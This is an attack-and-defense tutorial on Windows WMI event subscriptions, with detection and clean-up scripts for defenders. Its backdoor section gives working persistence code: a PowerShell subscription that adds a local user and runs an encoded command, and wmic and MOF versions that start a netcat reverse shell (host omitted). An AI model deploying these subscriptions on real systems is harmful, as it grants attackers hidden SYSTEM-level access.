WMI Attack and Defense


WMI is a Windows management technology; its full name is Windows Management Instrumentation (also translated as Windows Management Specification). Most Windows-based software relies on this service, which also makes it an attractive target for attackers. This article describes methods of attacking WMI and the corresponding security defenses, for discussion.

WMI exposes the operating system as classes and instances: each object is an instance of a class and is used to read operating system information or perform related operations. ROOT\CIMV2 is the default namespace, the CIM repository is the database, and WQL query statements are used to query WMI object instances, classes, and namespaces.

The primary ways of interacting with WMI are:

1. PowerShell (Get-WmiObject, Set-WmiInstance, Invoke-WmiMethod, etc.)

For example: Get-WmiObject -Namespace "ROOT" -Class __NAMESPACE

2. wmic

For example: wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_OperatingSystem


A WMI event subscription consists of a query that defines the event we are interested in and an action that we define to run once the event occurs. Two kinds of event subscription are supported:

1. Temporary events: active only while the process that created the subscription is running (they run with the permissions of the current user).

For example:

# Query for new process events
$queryCreate = "SELECT * FROM __InstanceCreationEvent WITHIN 5 " +
               "WHERE TargetInstance ISA 'Win32_Process'"

# Create the action to run when the event fires
$createAction = {
    $name = $Event.SourceEventArgs.NewEvent.TargetInstance.Name
    Write-Host "Process $($name) was created."
}

# Register the temporary WMI event subscription
Register-WmiEvent -Query $queryCreate -Action $createAction

Each time a new process is opened, the process name is output:
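The same temporary-subscription mechanism can be used from the defender's side. The following script is an added example, not code from the original article: while the elevated PowerShell session stays open, it watches the root\subscription namespace and reports every new filter, consumer or binding, which is exactly what a persistent WMI backdoor has to create. The function names Start-WmiSubscriptionWatch and Stop-WmiSubscriptionWatch and the source identifier prefix Watch_ are my own choices.

```powershell
# Added example (not from the original article): a temporary WMI event
# subscription used defensively. It only lives as long as this session and
# needs an elevated prompt, because root\subscription requires administrator rights.

# Classes that a persistent subscription (and therefore a WMI backdoor) must create.
$subscriptionClasses = '__EventFilter', '__EventConsumer', '__FilterToConsumerBinding'

# Action that runs for every new object; $Event is PowerShell's automatic event variable.
$alertAction = {
    $new   = $Event.SourceEventArgs.NewEvent.TargetInstance
    $stamp = Get-Date -Format 'yyyy-MM-dd HH:mm:ss'
    switch ($new.__CLASS) {
        '__EventFilter' {
            Write-Warning "[$stamp] New WMI filter '$($new.Name)': $($new.Query)"
        }
        '__FilterToConsumerBinding' {
            Write-Warning "[$stamp] New WMI binding: $($new.Filter) -> $($new.Consumer)"
        }
        default {
            # Any subclass of __EventConsumer (CommandLineEventConsumer, ActiveScriptEventConsumer, ...).
            Write-Warning "[$stamp] New WMI consumer ($($new.__CLASS)) '$($new.Name)'"
            if ($new.CommandLineTemplate) { Write-Warning "    CommandLineTemplate: $($new.CommandLineTemplate)" }
            if ($new.ScriptText)          { Write-Warning "    ScriptText: $($new.ScriptText)" }
            if ($new.ScriptFileName)      { Write-Warning "    ScriptFileName: $($new.ScriptFileName)" }
        }
    }
}

function Start-WmiSubscriptionWatch {
    # One temporary subscription per class; WITHIN 10 polls the repository every 10 seconds.
    foreach ($class in $subscriptionClasses) {
        $query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA '$class'"
        Register-WmiEvent -Namespace 'root\subscription' -Query $query `
            -SourceIdentifier "Watch_$class" -Action $alertAction | Out-Null
    }
    Write-Host "Watching root\subscription for new event subscriptions (Get-EventSubscriber lists the watchers)."
}

function Stop-WmiSubscriptionWatch {
    # Temporary subscriptions disappear with the session anyway; this removes them explicitly.
    Get-EventSubscriber | Where-Object { $_.SourceIdentifier -like 'Watch_*' } | Unregister-Event
}

Start-WmiSubscriptionWatch
```

Because the watcher itself is a temporary subscription, it leaves nothing behind in the CIM repository and runs as the current user; it is a monitoring aid for an interactive investigation, not a replacement for a persistent sensor.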


2. Persistent events: stored in the CIM repository and remain active until they are removed from it (they run with SYSTEM permissions and survive reboots).

Persistent events as a backdoor

Using persistent events as a backdoor requires three parts (creating them requires administrator privileges).

1. Event filter: defines the trigger condition, such as system startup, execution of a specific program, or a fixed time interval. Filters are stored as instances of the __EventFilter class in the ROOT\subscription namespace, and most use the WQL WITHIN clause to specify the polling interval.

2. Event consumer: specifies the action to perform, such as executing a command (CommandLineEventConsumer), running a script (ActiveScriptEventConsumer), writing a log entry (NTEventLogEventConsumer), or sending mail (SMTPEventConsumer).

3. Binding: links a filter to a consumer (the __FilterToConsumerBinding class).

Backdoor examples

Whether implemented with PowerShell, wmic, or a MOF file, the backdoor is made up of the same three parts.

PowerShell implementation

Effect: the PowerShell command is run every 60 seconds.

$filterName = 'Filtertest'
$consumerName = 'Consumertest'
$exePath = 'powershell -ep bypass -command "net user xxx xxx /add"'
$exePath2 = 'powershell -ep bypass -enc dwBoAG8AYQBtAGkA'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

Define the filter:

$WMIEventFilter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{Name=$filterName; EventNameSpace="root\cimv2"; QueryLanguage="WQL"; Query=$Query} -ErrorAction Stop

Define the consumer:

$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName; ExecutablePath=$exePath; CommandLineTemplate=$exePath}

Define the binding:

Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter; Consumer=$WMIEventConsumer}

wmic implementation

Effect: triggers a reverse shell each time the query fires (every 60 seconds).

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="Filtertest", EventNamespace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="Consumertest", ExecutablePath="C:\Users\admin\Desktop\nc.exe", CommandLineTemplate="C:\Users\admin\Desktop\nc.exe 443 -e c:\windows\system32\cmd.exe"

wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"Filtertest\"", Consumer="CommandLineEventConsumer.Name=\"Consumertest\""


Today, WMI event subscriptions of this kind are also frequently abused in real-world attacks.


MOF implementation

Effect: triggers a reverse shell every 30 minutes.

#pragma namespace ("\\\\.\\root\\subscription")

instance of __EventFilter as $FILTER
{
    Name = "FilterTEST";
    EventNamespace = "root\\cimv2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Minute = 30 ";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $CONSUMER
{
    Name = "ConsumerTEST";
    ScriptingEngine = "VBScript";
    ScriptText =
        "Set objShell = CreateObject(\"WScript.Shell\")\n"
        "objShell.Run \"C:\\Windows\\system32\\cmd.exe /C C:\\nc.exe 443 -e C:\\Windows\\system32\\cmd.exe\"\n";
};

instance of __FilterToConsumerBinding
{
    Consumer = $CONSUMER;
    Filter = $FILTER;
};

To compile and register the MOF file:

mofcomp xx.mof

The consumer can also run a VBScript file directly instead of inline script text:

instance of ActiveScriptEventConsumer as $Cons
{
    Name = "ASEC";
    ScriptingEngine = "VBScript";
    ScriptFileName = "c:\\asec.vbs";
};

Security defense

Enumerate the persistent event subscriptions on the host; filters, consumers and bindings all live in the root\subscription namespace:

Get-WmiObject -Namespace root\subscription -Class __EventFilter

Get-WmiObject -Namespace root\subscription -Class __EventConsumer

Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding

Remove a malicious subscription by deleting its filter, consumer and binding (BotFilter82 and BotConsumer23 are example names):

Get-WmiObject -Namespace root\subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose

Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose

Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose
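The three enumeration commands above list filters, consumers and bindings separately, which makes it hard to see which query triggers which payload. As an added example that is not code from the original article, the following script resolves each binding to its filter query and consumer payload and flags the consumer types the backdoors above rely on; it also wraps the removal commands so that a whole subscription is deleted by name. The function names Get-WmiSubscriptionAudit and Remove-WmiSubscription are my own, and the script assumes an elevated Windows PowerShell 5.1 session where the Get-WmiObject cmdlets are available.

```powershell
# Added example (not from the original article): audit and clean-up of
# persistent WMI event subscriptions. Run from an elevated PowerShell session.

function Get-WmiSubscriptionAudit {
    $ns = 'root\subscription'
    $filters   = @(Get-WmiObject -Namespace $ns -Class __EventFilter)
    $consumers = @(Get-WmiObject -Namespace $ns -Class __EventConsumer)   # base class: all consumer types
    $bindings  = @(Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding)

    foreach ($b in $bindings) {
        # Filter and Consumer are relative object paths such as
        #   __EventFilter.Name="Filtertest"
        # so they are matched against each object's own __RELPATH.
        $f = $filters   | Where-Object { $_.__RELPATH -eq $b.Filter }   | Select-Object -First 1
        $c = $consumers | Where-Object { $_.__RELPATH -eq $b.Consumer } | Select-Object -First 1

        $payload    = $null
        $suspicious = $false
        if ($c) {
            switch ($c.__CLASS) {
                # The two consumer types that execute arbitrary commands or scripts.
                'CommandLineEventConsumer'  { $payload = $c.CommandLineTemplate; $suspicious = $true }
                'ActiveScriptEventConsumer' {
                    $payload = if ($c.ScriptText) { $c.ScriptText } else { $c.ScriptFileName }
                    $suspicious = $true
                }
                default { $payload = $c.__RELPATH }
            }
        }

        [PSCustomObject]@{
            FilterName   = if ($f) { $f.Name }  else { "<unresolved: $($b.Filter)>" }
            Query        = if ($f) { $f.Query } else { $null }
            ConsumerName = if ($c) { $c.Name }  else { "<unresolved: $($b.Consumer)>" }
            ConsumerType = if ($c) { $c.__CLASS } else { $null }
            Payload      = $payload
            Suspicious   = $suspicious
        }
    }
}

function Remove-WmiSubscription {
    param(
        [Parameter(Mandatory)][string]$FilterName,
        [Parameter(Mandatory)][string]$ConsumerName
    )
    $ns = 'root\subscription'
    # Delete the binding first so nothing fires while the filter and consumer are removed.
    Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -like "*Name=`"$FilterName`"*" -and $_.Consumer -like "*Name=`"$ConsumerName`"*" } |
        Remove-WmiObject -Verbose
    Get-WmiObject -Namespace $ns -Class __EventFilter -Filter "Name='$FilterName'" | Remove-WmiObject -Verbose
    # Name is defined on the concrete consumer classes, so filter client-side rather than in WQL.
    Get-WmiObject -Namespace $ns -Class __EventConsumer | Where-Object { $_.Name -eq $ConsumerName } | Remove-WmiObject -Verbose
}

# Usage: show everything, then only the subscriptions that execute commands or scripts.
Get-WmiSubscriptionAudit | Format-Table -AutoSize
Get-WmiSubscriptionAudit | Where-Object { $_.Suspicious } | Format-List
# Clean-up of the backdoor from the PowerShell example above would be:
#   Remove-WmiSubscription -FilterName 'Filtertest' -ConsumerName 'Consumertest'
```

A flagged row is not automatically malicious: every Windows installation carries a benign "SCM Event Log Filter" bound to an NTEventLogEventConsumer, and older versions also ship a BVTFilter/BVTConsumer pair that uses ActiveScriptEventConsumer. Judge the Payload column, and treat any CommandLineEventConsumer or ActiveScriptEventConsumer whose command or script you cannot account for as an incident rather than just deleting it, since the objects themselves are the evidence.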